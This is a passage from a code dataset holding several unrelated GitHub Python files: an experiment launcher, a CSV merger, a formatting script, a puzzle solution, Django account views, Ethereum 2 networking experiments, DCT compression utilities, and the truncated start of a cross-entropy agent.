os.remove(isVlcPlaying)\n\n","repo_name":"eliranwong/myhand","sub_path":"package/letmedoit/utils/vlc_utils.py","file_name":"vlc_utils.py","file_ext":"py","file_size_in_byte":4796,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"36657712595","text":"# APP-VT is an experimental feature which would use Intel-PIN-TOOL for instruction counting.\n# This example script shows how such an experiment can be started. NOTE how /usr/bin/app_vt_tracer\n# is used to start the binaries instead of /usr/bin/tracer. 
This is the only difference.\n\nimport sys\nimport os\nimport time\nimport kronos_functions as kf\nimport sys\nimport argparse\n\n\ndef start_new_dilated_process(total_num_tracers, cmd_to_run, log_file_fd, rel_cpu_speed):\n newpid = os.fork()\n if newpid == 0:\n os.dup2(log_file_fd, sys.stdout.fileno())\n os.dup2(log_file_fd, sys.stderr.fileno())\n args = [\"/usr/bin/app_vt_tracer\", \"-n\", str(total_num_tracers), \"-c\", cmd_to_run, \"-r\", str(rel_cpu_speed)]\n os.execvp(args[0], args)\n else:\n return newpid\n\n\ndef main():\n\n \n parser = argparse.ArgumentParser()\n\n\n parser.add_argument('--cmds_to_run_file', dest='cmds_to_run_file',\n help='path to file containing commands to run', \\\n type=str, default='cmds_to_run_file.txt')\n\n\n parser.add_argument('--num_insns_per_round', dest='num_insns_per_round',\n help='Number of insns per round', type=int,\n default=1000000)\n\n parser.add_argument('--num_progress_rounds', dest='num_progress_rounds',\n help='Number of rounds to run', type=int,\n default=2000)\n\n parser.add_argument('--rel_cpu_speed', dest='rel_cpu_speed',\n help='relative cpu speed', type=float, \\\n default=1.0)\n\n args = parser.parse_args()\n log_fds = []\n tracer_pids = []\n cmds_to_run = []\n\n\n if not os.path.isfile(args.cmds_to_run_file):\n print (\"Commands file path is incorrect !\")\n sys.exit(0)\n fd1 = open(args.cmds_to_run_file, \"r\")\n cmds_to_run = [x.strip() for x in fd1.readlines()]\n fd1.close()\n for i in range(0, len(cmds_to_run)) :\n with open(\"/tmp/tracer_log%d.txt\" %(i), \"w\") as f:\n pass\n log_fds = [ os.open(\"/tmp/tracer_log%d.txt\" %(i), os.O_RDWR | os.O_CREAT ) \\\n for i in range(0, len(cmds_to_run)) ]\n num_tracers = len(cmds_to_run)\n\n input('Press any key to continue !')\n for i in range(0, num_tracers) :\n with open(\"/tmp/tracer_log%d.txt\" %(i), \"w\") as f:\n pass\n log_fds = [ os.open(\"/tmp/tracer_log%d.txt\" %(i), os.O_RDWR | os.O_CREAT ) \\\n for i in range(0, num_tracers) ]\n\n print (\"Initializing VT Module !\" ) \n if kf.initializeExp(num_tracers) < 0 :\n print (\"VT module initialization failed ! Make sure you are running \"\n \"the dilated kernel and kronos module is loaded !\")\n sys.exit(0)\n\n input('Press any key to continue !')\n \n print (\"Starting all commands to run !\")\n \n for i in range(0, num_tracers):\n print (\"Starting tracer: %d\" %(i + 1))\n start_new_dilated_process(num_tracers, cmds_to_run[i], log_fds[i], args.rel_cpu_speed)\n \n print (\"Synchronizing anf freezing tracers ...\")\n while kf.synchronizeAndFreeze() <= 0:\n print (\"VT Module >> Synchronize and Freeze failed. Retrying in 1 sec\")\n time.sleep(1)\n\n input('Press any key to continue !')\n print (\"Starting Synchronized Experiment !\")\n start_time = float(time.time())\n if args.num_progress_rounds > 0 :\n print (\"Running for %d rounds ... \" %(args.num_progress_rounds))\n num_finised_rounds = 0\n step_size = min(10, args.num_progress_rounds)\n while num_finised_rounds < args.num_progress_rounds:\n kf.progressBy(args.num_insns_per_round, step_size)\n num_finised_rounds += step_size\n #input(\"Press Enter to continue...\")\n print (\"Ran %d rounds ...\" %(num_finised_rounds),\n \" elapsed time ...\", float(time.time()) - start_time)\n\n elapsed_time = float(time.time()) - start_time\n print (\"Total time elapsed (secs) = \", elapsed_time)\n input(\"Press Enter to continue...\")\n print (\"Stopping Synchronized Experiment !\")\n kf.stopExp()\n\n for fd in log_fds:\n os.close(fd)\n\n print(\"Finished ! 
Logs of each ith tracer can be found in /tmp/tracer_logi.txt\")\n \n \n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"Vignesh2208/Kronos","sub_path":"examples/example_app_vt_experiment.py","file_name":"example_app_vt_experiment.py","file_ext":"py","file_size_in_byte":4289,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"45"} +{"seq_id":"4799633571","text":"from argparse import ArgumentParser\nimport logging\nimport pandas as pd\n\nlogger = logging.getLogger(__name__)\n\nbeauty_targets = [\n 'Benefits', 'Brand',\n 'Colour_group', 'Product_texture',\n 'Skin_type']\n\nfashion_targets = [\n 'Pattern', 'Collar Type',\n 'Fashion Trend', 'Clothing Material',\n 'Sleeves']\n\nmobile_targets = [\n 'Operating System', 'Features',\n 'Network Connections', 'Memory RAM',\n 'Brand', 'Warranty Period',\n 'Storage Capacity', 'Color Family',\n 'Phone Model', 'Camera', 'Phone Screen Size']\n\n\ndef main():\n parser = ArgumentParser(description='Combine predictions.')\n parser.add_argument('-f', '--files', type=str, nargs='+', metavar='', required=True, help='List of prediction file pathsargparse.FileType('r'), nargs='+',.')\n parser.add_argument('--seed', type=int, default=0, help='Random seed.')\n A = parser.parse_args()\n\n log_level = 'DEBUG'\n log_format = '%(asctime)-15s [%(name)s-%(process)d] %(levelname)s: %(message)s'\n logging.basicConfig(format=log_format, level=logging.getLevelName(log_level))\n\n out_df = pd.DataFrame(columns=['id', 'tagging'])\n for f in A.files:\n logger.info('Starting with {}....'.format(f))\n if 'beauty' in f:\n targets = beauty_targets\n elif 'fashion' in f:\n targets = fashion_targets\n elif 'mobile' in f:\n targets = mobile_targets\n #end if\n\n df = pd.read_csv(f)\n\n count = 0\n tmp_df = pd.DataFrame(columns=['id', 'tagging'])\n id_list = list()\n tagging_list = list()\n for i, row in df.iterrows():\n _id = str(row['itemid'])\n for target in targets:\n id_list.append(_id + '_' + target)\n tagging_list.append(row[target])\n #end for\n\n count += 1\n if count % 1000 == 0:\n logger.info('Hang on.... Has processed {} rows of data....'.format(count))\n #end for\n tmp_df['id'] = pd.Series(id_list)\n tmp_df['tagging'] = pd.Series(tagging_list)\n\n out_df = pd.concat([out_df, tmp_df])\n\n logger.info('Done with {}....'.format(f))\n #end for\n\n out_df.to_csv('./data/submission.csv', index=False)\n#end def\n\nif __name__ == '__main__': main()\n","repo_name":"wayneczw/nanyang-code-farmer","sub_path":"combine_pred.py","file_name":"combine_pred.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"38664382574","text":"\"\"\"\nA simple script to automate code cleanups.\nDid not copy majority from PygameCommunityBot again\n\"\"\"\n\nfrom __future__ import annotations\n\nimport glob\nimport os\nimport pathlib\nimport subprocess\nimport sys\n\ntry:\n import black\nexcept ImportError:\n print(\"We use black to format code. Please install it with 'pip install black'\")\n raise SystemExit\n\ntry:\n import isort\nexcept ImportError:\n print(\"We use isort to format code. 
Please install it with 'pip install isort'\")\n raise SystemExit\n\nHEADER_TEXT = '''\"\"\"\nThis file is a part of the source code for rpg-tile-game\nThis project has been licensed under the MIT license.\nCopyright (c) 2022-present SSS-Says-Snek\n'''\n\n\nclass DummyPrinter:\n def success(self, msg):\n pass\n\n def error(self, msg):\n pass\n\n def diff_line(self, line):\n pass\n\n\ndef check_header_string():\n added_header = False\n for filepath in glob.iglob(\"**/*.py\", recursive=True):\n file = pathlib.Path(os.getcwd(), filepath)\n file_data = file.read_text().lstrip()\n if file_data.startswith(HEADER_TEXT):\n continue\n\n if not file_data.startswith('\"\"\"'):\n added_header = True\n file.write_text(f'{HEADER_TEXT}\"\"\"\\n\\n{file_data}')\n print(\"Added header:\", filepath)\n\n if not added_header:\n print(\"No files without headers!\")\n\n\ndef check_imports():\n reorganized_imports = False\n isort.api.create_terminal_printer = lambda *args, **kwargs: DummyPrinter()\n\n for filepath in glob.iglob(\"**/*.py\", recursive=True):\n file = pathlib.Path(os.getcwd(), filepath)\n if isort.file(file):\n reorganized_imports = True\n print(\"Reorganized import:\", filepath)\n\n if not reorganized_imports:\n print(\"No imports in need of reorganizing!\")\n\n\ndef cleanup_code():\n \"\"\"\n Clean up all files of a given extension under a directory\n \"\"\"\n for filepath in glob.iglob(\"**/*.py\", recursive=True):\n path = pathlib.Path(os.getcwd(), filepath)\n if black.format_file_in_place(path, False, black.FileMode(line_length=119), black.WriteBack.YES):\n print(\"Formatted file:\", filepath)\n else:\n print(f\"Skipping file {filepath} as it is already formatted\")\n\n print(\"\\n====================== Adding headers ======================\")\n check_header_string()\n\n print(\"\\n====================== Reorganizing imports ======================\")\n subprocess.run([sys.executable, \"-m\", \"isort\", \".\"])\n\n print(\"\\n====================== Adding future imports ======================\")\n subprocess.run(\n [sys.executable, \"-m\", \"isort\", \".\", \"--add-import\", \"from __future__ import annotations\"],\n stdout=subprocess.DEVNULL,\n )\n print(\"Done!\")\n\n # What is going on\n # print(\"\\n====================== Reorganizing imports ======================\")\n # check_imports()\n\n\nif __name__ == \"__main__\":\n cleanup_code()\n","repo_name":"SSS-Says-Snek/rpg-tile-game","sub_path":"cleancode.py","file_name":"cleancode.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"45"} +{"seq_id":"69864105098","text":"#!/usr/bin/env python3\n\nwith open(\"input.txt\") as fh:\n x_max = 0\n y_max = 0\n lines = []\n\n ## parse the input file and find max dimentions.\n for l in fh:\n (fro, to) = l.split(\"->\")\n fro = fro.strip().split(\",\")\n to = to.strip().split(\",\")\n\n lines.append((fro,to))\n\n l = [int(fro[0]), int(to[0]), x_max]\n x_max = max(l)\n y_max = max([int(fro[1]), int(to[1]), y_max])\n\n x_max += 1\n y_max += 1\n\n board = [ [0]*x_max for x in range(y_max) ]\n\n ## Now draw the lines onto the board.\n for line in lines:\n (fro, to) = line\n\n fro = list(map(lambda x: int(x), fro))\n to = list(map(lambda x: int(x), to))\n\n (xFrom, xTo ) = (fro[0], to[0]) if fro[0] < to[0] else (to[0], fro[0])\n (yFrom, yTo ) = (fro[1], to[1]) if fro[1] < to[1] else (to[1], fro[1])\n\n assert(xFrom <= xTo)\n assert(yFrom <= yTo)\n\n ## handle the easy case\n if ( xFrom == xTo or yFrom == yTo ):\n for y in 
range(yFrom, yTo+1):\n for x in range(xFrom, xTo+1):\n board[y][x] += 1\n else:\n dX = fro[0] - to[0]\n dY = fro[1] - to[1]\n\n assert(abs(dX) == abs(dY))\n steps = abs(dX) + 1\n x_dir = -1 if dX < 0 else 1\n y_dir = -1 if dY < 0 else 1\n\n tX = to[0]\n tY = to[1]\n\n for i in range(steps):\n board[tY][tX] +=1\n tX += x_dir\n tY += y_dir\n\n\n total = 0\n\n## Print the board here.\n# for y in range(y_max):\n# for x in range(x_max):\n# print(board[y][x], \"\", end=\"\")\n# if board[y][x] >= 2:\n# total += 1\n# print()\n#\n print(total)\n","repo_name":"langly/adventofcode","sub_path":"2021/day5/day5_1.py","file_name":"day5_1.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"25153763357","text":"from django.shortcuts import render\r\n\r\nfrom rest_framework import status\r\nfrom rest_framework.response import Response\r\nfrom rest_framework.authtoken.models import Token\r\nfrom rest_framework.decorators import api_view, permission_classes\r\nfrom rest_framework.permissions import AllowAny, IsAdminUser, IsAuthenticated\r\n\r\nfrom account.models import Account\r\nfrom account.serializers import AccountSerializer\r\n\r\n# Create your views here.\r\n@api_view(['GET'])\r\n@permission_classes([AllowAny])\r\ndef accountTest(request):\r\n accounts = Account.objects.all()\r\n serializer = AccountSerializer(accounts, many = True)\r\n data = serializer.data\r\n return Response(data, status = status.HTTP_200_OK)\r\n\r\n@api_view(['POST'])\r\n@permission_classes([AllowAny])\r\ndef accountRegister(request):\r\n response = {}\r\n serializer = AccountSerializer(data = request.data)\r\n if serializer.is_valid():\r\n account = serializer.save()\r\n token = Token.objects.get(user = account).key\r\n response['email'] = account.email\r\n response['username'] = account.username\r\n response['token'] = token\r\n response['status'] = 'Account Successfully Created!'\r\n return Response(response, status = status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST)\r\n\r\n@api_view(['GET', 'PATCH'])\r\n@permission_classes([IsAdminUser|IsAuthenticated])\r\ndef accountProfile(request, role, email):\r\n try:\r\n account = Account.objects.get(email = email)\r\n except Account.DoesNotExist:\r\n message = {'error': 'Sorry, seems there\\'s a problem with your email'}\r\n return Response(message, status = status.HTTP_404_NOT_FOUND)\r\n \r\n if not request.user.is_staff and account != request.user:\r\n message = {'error': 'Sorry, you\\'re prohibited in this area'}\r\n return Response(message, status = status.HTTP_403_FORBIDDEN)\r\n\r\n if account.role != role:\r\n message = {'error': 'Sorry, seems there\\'s a problem with the slug that relate to the email or role'}\r\n return Response(message, status = status.HTTP_400_BAD_REQUEST)\r\n \r\n if request.method == 'GET':\r\n serializer = None\r\n data = None\r\n\r\n if account.role == 'buyer':\r\n serializer = AccountSerializer(account, many = False, fields = (\r\n 'username', 'email', 'role', 'namaLengkap', 'nomorInduk', 'angkatan', 'jurusan'\r\n ))\r\n data = serializer.data\r\n data['password'] = '*******'\r\n elif account.role == 'seller':\r\n serializer = AccountSerializer(account, many = False, fields = (\r\n 'username', 'email', 'role', 'namaLengkap', 'namaPanggilan', 'nomorHP', 'namaToko', 'tipeDagangan'\r\n ))\r\n data = serializer.data\r\n data['password'] = '*******'\r\n\r\n return Response(data, status = 
status.HTTP_200_OK)\r\n elif request.method == 'PATCH':\r\n \r\n serializer = None\r\n if account.role == 'buyer':\r\n serializer = AccountSerializer(account, data = request.data, partial = True, fields = (\r\n 'username', 'email', 'role', 'namaLengkap', 'nomorInduk', 'angkatan', 'jurusan', 'password', 'passwordConfirmation'\r\n ))\r\n elif account.role == 'seller':\r\n serializer = AccountSerializer(account, data = request.data, partial = True, fields = (\r\n 'username', 'email', 'role', 'namaLengkap', 'namaPanggilan', 'nomorHP', 'namaToko', 'tipeDagangan'\r\n ))\r\n\r\n if serializer.is_valid():\r\n serializer.update(account.email)\r\n return Response(serializer.data, status = status.HTTP_202_ACCEPTED)\r\n return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST)","repo_name":"faisaladisoe/Magerbun-Auth","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"33286389250","text":"import trio\nimport os\nimport io\nfrom typing import Coroutine, Callable\n\nfrom pyrum import Rumor, SubprocessConn\n\n\n# Before importing spec, load config:\n# from eth2spec.config.config_util import prepare_config\n# prepare_config(\"./some-dir\", \"config-name\")\n\nfrom eth2spec.phase0.spec import *\n\n\nclass Status(Container):\n version: Bytes4\n finalized_root: Bytes32\n finalized_epoch: uint64\n head_root: Bytes32\n head_slot: uint64\n\n\nclass Goodbye(uint64):\n pass\n\n\nclass BlocksByRange(Container):\n head_block_root: Bytes32\n start_slot: uint64\n count: uint64\n step: uint64\n\n\nclass BlocksByRoot(List[SignedBeaconBlock, 1024]):\n pass\n\n\ndef load_state(filepath: str) -> BeaconState:\n state_size = os.stat(filepath).st_size\n with io.open(filepath, 'br') as f:\n return BeaconState.deserialize(f, state_size)\n\n\nasync def basic_status_example(rumor: Rumor, nursery: trio.Nursery):\n\n # Load some genesis state of the client (or use make_genesis.py)\n state = load_state('genesis.ssz')\n\n # Morty is us\n morty = rumor.actor('morty')\n await morty.host.start()\n await morty.host.listen(tcp=9000)\n print(\"started morty\")\n\n # Rick is the other client\n rick_enr = \"enr:-Iu4QGuiaVXBEoi4kcLbsoPYX7GTK9ExOODTuqYBp9CyHN_PSDtnLMCIL91ydxUDRPZ-jem-o0WotK6JoZjPQWhTfEsTgmlkgnY0gmlwhDbOLfeJc2VjcDI1NmsxoQLVqNEoCVTC74VmUx25USyFe7lL0TgpXHaCX9CDy9H6boN0Y3CCIyiDdWRwgiMo\"\n\n rick_peer_id = await morty.peer.connect(rick_enr, \"bootnode\").peer_id()\n\n print(f\"connected to Rick {rick_peer_id}\")\n\n print(\"Testing a Status RPC request\")\n\n head = state.latest_block_header.copy()\n head.state_root = state.hash_tree_root()\n\n # Sync status\n morty_status = Status(\n version=compute_fork_digest(state.fork.current_version, state.genesis_validators_root),\n finalized_root=state.finalized_checkpoint.root,\n finalized_epoch=0,\n head_root=head.hash_tree_root(),\n head_epoch=0,\n )\n\n req = morty_status.encode_bytes().hex()\n print(f\"morty: sending rick a status request: {req}\")\n\n # Note: public testnet node is not updated, only receiving an empty response if snappy is enabled.\n resp = await morty.rpc.status.req.raw(rick_peer_id, req, raw=True)\n\n print(f\"morty: received status response from rick: {resp}\")\n try:\n rick_status = Status.decode_bytes(bytes.fromhex(resp['chunk']['data']))\n print(rick_status)\n except Exception as e:\n print(f\"could not decode status response: {e}\")\n\n call = morty.rpc.status.listen(raw=True, 
compression='snappy')\n # Other keywords to try here:\n # Req-resp timeout: timeout=123000 (in milliseconds, 0 to disable)\n # Drop contents, not keeping track of them to reply later: drop=True\n # Ignore request bytes, do not read any: read=False\n\n async def process_requests():\n async for req in call.req():\n print(f\"morty: Got request: {req}\")\n\n # Respond with Input error\n # await morty.rpc.status.resp.invalid_request(req['req_id'], f\"hello! Morty does not like your request!\")\n\n # Respond with server error\n # await morty.rpc.status.resp.server_error(req['req_id'], f\"hello! Morty failed, look for a new morty!\")\n\n # Respond with valid chunk (and done=True to exit immediately after)\n resp = morty_status.encode_bytes().hex()\n await morty.rpc.status.resp.chunk.raw(req['req_id'], resp, done=True)\n\n # Or send arbitrary data\n # resp = bytes.fromhex('1337')\n # await morty.rpc.status.resp.chunk.raw(req['req_id'], resp, result_code=2, done=True)\n\n print(\"morty: stopped listening for requests\")\n\n print(\"listening for requests\")\n await process_requests()\n\n # Or start listening in the background:\n # nursery.start_soon(process_requests)\n # await call.started() # wait for the stream handler to come online, there will be a \"started=true\" entry.\n\n\nasync def server_blocks_by_range_example(rumor: Rumor, nursery: trio.Nursery):\n\n # Morty is us\n morty = rumor.actor('morty')\n await morty.host.start()\n await morty.host.listen(tcp=9000)\n print(\"started morty\")\n\n # Rick is the other client\n rick_enr = \"enr:-Iu4QGuiaVXBEoi4kcLbsoPYX7GTK9ExOODTuqYBp9CyHN_PSDtnLMCIL91ydxUDRPZ-jem-o0WotK6JoZjPQWhTfEsTgmlkgnY0gmlwhDbOLfeJc2VjcDI1NmsxoQLVqNEoCVTC74VmUx25USyFe7lL0TgpXHaCX9CDy9H6boN0Y3CCIyiDdWRwgiMo\"\n\n rick_peer_id = await morty.peer.connect(rick_enr, \"bootnode\").peer_id()\n\n print(f\"connected to Rick {rick_peer_id}\")\n\n call = morty.rpc.blocks_by_range.listen(raw=True, compression='snappy')\n\n print(\"listening for requests\")\n\n async for req in call.req():\n print(f\"morty: Got request: {req}\")\n\n parsed_req = BlocksByRange.decode_bytes(bytes.fromhex(req['chunk']['data']))\n print('parsed request: ', parsed_req)\n\n start = parsed_req.start_slot\n end = start + parsed_req.count * parsed_req.step\n\n for i, slot in zip(range(parsed_req.count), range(start, end, parsed_req.step)):\n # Try any message:\n # resp = f\"not a block, but can you decode this chunk though? 
chunk nr {i} here\".encode()\n # Or construct a block (can make it more consensus-valid, but snappy compression testing can be simple):\n resp = SignedBeaconBlock(message=BeaconBlock(slot=slot)).encode_bytes().hex()\n print(f\"responding chunk {i} slot {slot} chunk: {resp}\")\n await morty.rpc.blocks_by_range.resp.chunk.raw(req['req_id'], resp, done=(i + 1 == parsed_req.count))\n\n print(\"done responding\")\n\n print(\"morty: stopped listening for requests\")\n\n\nasync def server_blocks_by_root_example(rumor: Rumor, nursery: trio.Nursery):\n\n # Morty is us\n morty = rumor.actor('morty')\n await morty.host.start()\n await morty.host.listen(tcp=9000)\n print(\"started morty\")\n\n # Rick is the other client\n rick_enr = \"enr:-Iu4QGuiaVXBEoi4kcLbsoPYX7GTK9ExOODTuqYBp9CyHN_PSDtnLMCIL91ydxUDRPZ-jem-o0WotK6JoZjPQWhTfEsTgmlkgnY0gmlwhDbOLfeJc2VjcDI1NmsxoQLVqNEoCVTC74VmUx25USyFe7lL0TgpXHaCX9CDy9H6boN0Y3CCIyiDdWRwgiMo\"\n\n rick_peer_id = await morty.peer.connect(rick_enr, \"bootnode\").peer_id()\n\n print(f\"connected to Rick {rick_peer_id}\")\n\n call = morty.rpc.blocks_by_root.listen(raw=True, compression='snappy')\n\n print(\"listening for requests\")\n\n async for req in call.req():\n print(f\"morty: Got request: {req}\")\n\n parsed_req = BlocksByRoot.decode_bytes(bytes.fromhex(req['chunk']['data']))\n print('parsed request: ', parsed_req)\n\n for i, root in enumerate(parsed_req):\n resp = SignedBeaconBlock(message=BeaconBlock(slot=slot)).encode_bytes().hex()\n print(f\"responding chunk {i} root {root}, chunk: {resp}\")\n await morty.rpc.blocks_by_range.resp.chunk.raw(req['req_id'], resp, done=(i + 1 == len(parsed_req)))\n\n print(\"done responding\")\n\n print(\"morty: stopped listening for requests\")\n\n\nasync def run_rumor_function(fn: Callable[[Rumor, trio.Nursery], Coroutine]):\n async with trio.open_nursery() as nursery:\n try:\n async with SubprocessConn(cmd='cd ../rumor && go run . 
bare') as conn:\n # A Trio nursery hosts all the async tasks of the Rumor instance.\n async with trio.open_nursery() as nursery:\n # And optionally use Rumor(conn, debug=True) to be super verbose about Rumor communication.\n await fn(Rumor(conn, nursery), nursery)\n # Cancel the nursery to signal that we are not using Rumor anymore\n nursery.cancel_scope.cancel()\n except Exception as e:\n print(e)\n\n\ntrio.run(run_rumor_function, basic_status_example)\n# trio.run(run_rumor_function, server_blocks_by_range_example)\n# trio.run(run_rumor_function, server_blocks_by_root_example)\n","repo_name":"protolambda/eth2-snappy-experiments","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":7895,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"45"} +{"seq_id":"19949619486","text":"import torch\nimport numpy as np\n\n# torch to numpy:\na = torch.ones(5)\nb = a.numpy()\n#print(a)\n#print(b)\n#print(type(b))\n\n# GPU check (with CPU both a and c will be on CPU):\na.add_(1)\n#print(a)\n#print(b)\n\n# numpy to torch:\nzz = np.ones(5)\n#print(zz)\nyy = torch.from_numpy(zz) # y and z share the same memory location\n#print(yy)\nzz = zz + 1\n#print(zz)\n#print(yy)\n# looks like this time the memory location is not shared\n\n# cuda check:\nif torch.cuda.is_available():\n device = torch.device(\"cuda\")\n x = torch.ones(5, device=device)\n y = torch.ones(5)\n y = y.to(device) # or y = y.cuda()\n z = x + y\n z = z.to(\"cpu\") # or z = z.cpu()\n print(z)\n print(z.numpy())\n\n# requires_grad - gradient calculation (when we have a variable we want to optimize):\ng = torch.ones(5, requires_grad=True)\nprint(g)\n","repo_name":"eggressive/pytorch-basics","sub_path":"numpy_ts.py","file_name":"numpy_ts.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"23144779963","text":"import numpy as np\nimport cv2 \nimport math\nimport matplotlib.pyplot as plt\n\ndef my_dct(matrix, N) :\n \"\"\"\n This function break up the matrix in blocks and then apply to each of them \n the default dct provided by opencv \n\n Args:\n matrix : Matrix to which apply the dct\n N : The block dimension\n\n Returns:\n The dct matrix rebuild from the blocks\n \"\"\"\n\n height, width = matrix.shape \n block_list = matrix_to_blocks(np.float32(matrix), N, height, width)\n \n #Applying the dct transformation per block\n dct_block_list = []\n for elem in block_list : \n dct_block_list.append(cv2.dct(elem))\n\n return blocks_to_matrix(dct_block_list, N, height, width)\n\n\n\ndef my_idct(matrix, N) :\n \"\"\"\n This function break up the matrix in blocks and then apply to each of them \n the default inversed dct provided by opencv. 
Then the matrix is build back from\n the block list\n\n Args:\n matrix : Matrix to which is applied the idct\n N : The block dimension\n\n Returns:\n The idct matrix rebuild from the blocks\n \"\"\"\n\n height, width = matrix.shape \n block_list = matrix_to_blocks(np.float32(matrix), N, height, width) \n \n #Applying the dct INVERTED transformation per block\n idct_block_list = []\n for mtrx in block_list : \n idct_block_list.append(cv2.idct(mtrx))\n idct_mtrx = np.round(blocks_to_matrix(idct_block_list, N, height, width))\n \n #some value might be higher than 255 or less than 0 after the idct, resulting the conversation in int8 to broke some image parts\n for i in range(height) : \n for j in range (width) : \n if idct_mtrx[i][j] > 255 : idct_mtrx[i][j] = 255 \n if idct_mtrx[i][j] < 0 : idct_mtrx[i][j] = 0\n \n #Building back the whole matrix, however the 8 bit unsigned integer version is returned; so the matrix can be immediatly used\n return np.uint8(idct_mtrx)\n\n\n\ndef matrix_to_blocks(matrix, N, h, w) : \n \"\"\"\n Given a matrix, this function break up the matrix in blocks. The dimension of the blocks are generally\n NxN, however on the edges of the matrix if the height and/or the width do not fit with NxN blocks, the dimension\n of the matrix is temporally changed to have blocks even sized (e.g with a 7x9 matrix and N=4, starting from the top-left \n corner, only 2 4x4 blocks can fit; since the number of columns and rows is odd, we temporally change the matrix dimension\n to 8x10. In this way the \"third\" block in the list will have a 4x2 dimension. The first row is ended, we move to the fifth row\n and keep iterate). The columns and rows must be even because the opencv dct accepts only even sized matrixes/blocks\n\n Args:\n matrix : Matrix to be decomposed\n N : The block dimension\n h : The height of the matrix\n w : The width of the matrix\n\n Returns:\n A list with all blocks\n \"\"\"\n\n fix_mtrx = padding(matrix, N, h, w) #changing size\n new_h, new_l = fix_mtrx.shape\n block_list = []\n\n for row_block in range(0, math.ceil(new_h/N)) :\n for col_block in range(0, math.ceil(new_l/N)) : \n \n col_indx = np.minimum(new_l - col_block*N, N)\n row_indx = np.minimum(new_h - row_block*N, N)\n\n block = np.zeros((row_indx, col_indx))\n for i in range(row_indx) :\n for j in range(col_indx) : \n block[i][j] = fix_mtrx[row_block*N + i][col_block*N + j] \n block_list.append(block)\n\n return block_list\n\n\n\ndef blocks_to_matrix(blocklist, N, mtrx_h, mtrx_w) : \n \"\"\"\n This function build from a given list of blocks a matrix, from which the block where derived\n\n Args:\n blocklist : A list of blocks\n N : The block dimension\n mtrx_h : The height of the matrix\n mtrx_w : The width of the matrix\n\n Returns:\n The builded matrix\n \"\"\"\n\n build_mtrx = np.zeros((mtrx_h, mtrx_w), np.float32)\n numblock_in_row = math.ceil(mtrx_w / N)\n \n for i in range(0, mtrx_h) :\n for j in range(0, mtrx_w) : \n build_mtrx[i][j] = blocklist[math.floor(i / N) * numblock_in_row + math.floor(j / N)][i%N][j%N]\n \n return build_mtrx\n\n\ndef padding(matrix, N, h, w) : \n \"\"\"\n This function resize a given matrix to its even form. 
If a row and/or column is added, the new values\n added next to the edge are copied from the near row/column\n\n Args:\n matrix : Matrix to be resized\n N : The block dimension\n h : The height of the matrix\n w : The width of the matrix\n\n Returns:\n The even sized matrix\n \"\"\"\n\n row_rem = h % N\n col_rem = w % N\n return np.pad(matrix, pad_width = ((0, 0 if row_rem % 2 == 0 else 1), (0, 0 if col_rem % 2 == 0 else 1)), mode = 'edge')\n\n\ndef percentage_loss (dct_mtrx, R) :\n \"\"\"\n This function set to 0 the R% values of the given matrix\n\n Args:\n dct_matrix : A matrix to which the dct was applied\n R : The percentage loss\n\n Returns:\n The \"compressed\" version of the matrix\n \"\"\"\n\n value = np.percentile(np.abs(dct_mtrx), R) #search the value for which %R in np.abs(dct_mtrx) are lower than this value returned\n mtrx_comp = np.copy(dct_mtrx)\n\n #The elements in the matrix lower than value are set to 0\n mtrx_comp[ np.abs(mtrx_comp) <= value ] = 0 #inline condition \n\n return mtrx_comp\n\n\ndef MSE (og_mtrx, compressed_mtrx) :\n \"\"\"\n Calculate the mean squared error between 2 matrixes\n\n Args:\n og_mtrx : original matrix\n compressed_mtrx : new matrix after some operations\n\n Returns:\n The mean squared error\n \"\"\"\n\n height, width = og_mtrx.shape\n sque = np.float64(0)\n for i in range(0, height) :\n for j in range(0, width) :\n sque += (int(compressed_mtrx[i][j]) - int(og_mtrx[i][j]))**2\n return sque / (height * width)\n\n\n\n#Weighted mean squared error\ndef MSE_P(MSE_Y, MSE_Cb, MSE_Cr) : return 0.75*MSE_Y + 0.125*MSE_Cb + 0.125*MSE_Cr\n\n\n\ndef PNSR(MSE_P) : return (10 * math.log((255**2 / MSE_P), 10)) if MSE_P != 0 else np.inf\n\n\n\ndef PSNR_plot(R_values, PSNR_values, img_name, N) :\n \"\"\"\n Simple function to save a PSNR plot in the ./Plot image folder\n\n Args: \n R_values : x axis values\n PSNR_values : y axis values\n img_file : file name + extension\n N : block dimension\n Returns:\n None\n \"\"\"\n \n plot = plt.figure()\n plt.title(img_name + \".jpg \" + str(N) + \"x\" + str(N) + \" blocks\")\n plt.yscale(\"linear\")\n plt.xlabel(\"R\")\n plt.ylabel(\"PSNR\")\n plt.xticks(R_values)\n plt.xlim([0, 101])\n plt.plot(R_values, PSNR_values, c = 'red')\n plt.grid()\n plot.savefig(\"Plot image/Plot \" + img_name + \" \" + str(N) + \" blocks.jpg\", bbox_inches = 'tight') \n\n\n\n\n\n\n\n\n\n\n","repo_name":"zincalex/Homework-DCT","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":6868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"32794479862","text":"#Cross-Entropy Algorithms for both discrete and continuous action spaces are implemented\n\n\nimport torch\nimport torch.optim as optim\nimport torch.nn.functional as func\nimport numpy as np\nfrom copy import deepcopy\nfrom Agents.Utilities.LinearTransformations import transform_interval\n\n\nclass CEM():\n def __init__(self, pi_model, noise, 